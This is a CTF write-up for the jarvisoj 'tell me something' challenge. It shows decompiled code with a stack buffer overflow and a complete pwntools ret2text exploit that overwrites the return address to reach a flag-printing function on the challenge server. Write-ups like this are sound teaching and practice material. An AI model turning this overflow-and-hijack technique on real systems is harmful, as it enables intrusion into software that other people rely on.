# jarvisoj tell me something
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/jarvisoj_tell_me_something/guestbook'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
# 静态分析
主函数如下
// Entry point of the guestbook binary and the bug the whole exploit rests on.
// v4 is a stack slot at [rbp-88h], yet read() is allowed to write 0x100 bytes into it,
// so up to 0x78 bytes spill past the slot toward the saved return address. checksec
// reports "No canary found", so nothing detects the clobber; NX only prevents executing
// the payload itself, which a ret2text jump into good_game() does not need.
// The exploit below reaches the return address with 0x88 bytes of padding — confirm the
// offset with a cyclic pattern under gdb before adapting this to another build.
int __cdecl main(int argc, const char **argv, const char **envp)
{
__int64 v4; // [rsp+0h] [rbp-88h] -- declared as 8 bytes, but used as the 0x100-byte read target
write(1, "Input your message:\n", 0x14uLL); // prompt; the exploit syncs on this text
read(0, &v4, 0x100uLL); // BUG: stack buffer overflow (0x100 > space below the return address)
return write(1, "I have received your message, Thank you!\n", 0x29uLL); // the overwritten return address is used right after this
}
good_game函数如下
// "Win" function: not reached from main(), so it must be jumped to via the overflow.
// Opens flag.txt and copies it to stdout one byte at a time.
// Caveats when relying on it remotely: the fopen() result is never checked, so a
// missing flag.txt means fgetc(NULL) crashes before anything is printed; and EOF is
// tested on the value truncated to one byte, so a literal 0xFF byte inside the file
// also terminates the loop early.
int good_game()
{
FILE *v0; // rbx
int result; // eax
char buf; // [rsp+Fh] [rbp-9h]
v0 = fopen("flag.txt", "r"); // not NULL-checked
while ( 1 )
{
result = fgetc(v0);
buf = result;
if ( (_BYTE)result == -1 ) // EOF check on the low byte only, not on the full int
break;
write(1, &buf, 1uLL); // one write() per character
}
return result;
}
readmessage函数如下
// Same pattern as main(): a 0x100-byte read() into a slot at [rbp-88h], i.e. a second,
// identical stack overflow. It is not referenced by the main() listing above, so the
// exploit does not need it; noted in case the entry point differs in another build.
ssize_t readmessage()
{
__int64 v1; // [rsp+0h] [rbp-88h] -- overflowed by the 0x100-byte read below
return read(0, &v1, 0x100uLL);
}
# 思路分析
- 目前信息：`main` 函数中 `read(0, &v4, 0x100)` 向位于 `[rbp-88h]` 的缓冲区读入 0x100 字节，存在栈溢出；`good_game` 函数会直接打开并逐字节打印 flag.txt，但 `main` 中并未调用它
- 保护情况：No canary（溢出覆盖返回地址不会被检测）、NX enabled（栈上 shellcode 不可执行，但 ret2text 不需要）、No PIE（`good_game` 地址在链接时固定，可直接从 ELF 符号表取得）
- 思路：
  - 用 0x88 = 136 字节填充覆盖到返回地址（与 `v4` 的偏移 `[rbp-88h]` 对应，可用 gdb + cyclic 验证），紧接着写入 `good_game` 的地址；`main` 返回时即跳转到 `good_game` 打印 flag
  - 注意：若远程不存在 flag.txt，`good_game` 会在 `fgetc(NULL)` 处崩溃而不输出任何内容；若在 `fopen`/`fgetc` 内部因栈 16 字节对齐问题崩溃，可先返回到一个单独的 `ret` gadget 再跳转到 `good_game`
# exp
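from pwn import *
from LibcSearcher import *  # unused here: the binary ships good_game(), so no libc leak/lookup is needed

context.terminal = ['tmux', 'splitw', '-h']
context(os='linux', arch='amd64', log_level='debug')

pwnfile = '/root/pwn/buuctf/jarvisoj_tell_me_something/guestbook'
elf = ELF(pwnfile)

# Default target is the challenge server (unchanged); `python exp.py LOCAL` debugs
# against a local process instead of editing the script back and forth.
if args.LOCAL:
    io = process(pwnfile)
else:
    io = remote('node4.buuoj.cn', 28491)

# main() reads 0x100 bytes into a buffer at [rbp-88h]; with no canary the surplus
# bytes overwrite the saved return address. 0x88 (136) bytes of padding lands the
# next qword on the return address (verify with a cyclic pattern if the build changes).
padding = 0x88
# ret2text: No PIE, so good_game's address is fixed and readable from the symbol table.
# Raises KeyError if the binary is stripped — then recover the address from IDA instead.
good_game = elf.symbols['good_game']
payload = flat([b'a' * padding, good_game])  # flat() packs the int as p64 under arch='amd64'
# NOTE(review): if good_game crashes inside fopen/fgetc, the usual cause is 16-byte
# stack misalignment after the hijacked ret; insert a lone `ret` gadget before good_game.

# Sync on the prompt rather than a blind recv(), which may return before the prompt arrives.
io.recvuntil(b'Input your message:\n')
io.send(payload)  # send(), not sendline(): read(0, ..., 0x100) takes exactly what we send
io.interactive()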